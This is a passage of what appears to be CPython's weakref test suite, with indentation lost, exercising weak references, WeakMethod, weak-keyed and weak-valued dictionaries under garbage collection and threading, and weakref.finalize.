# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
            # Since the underlying dict is ordered, the first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
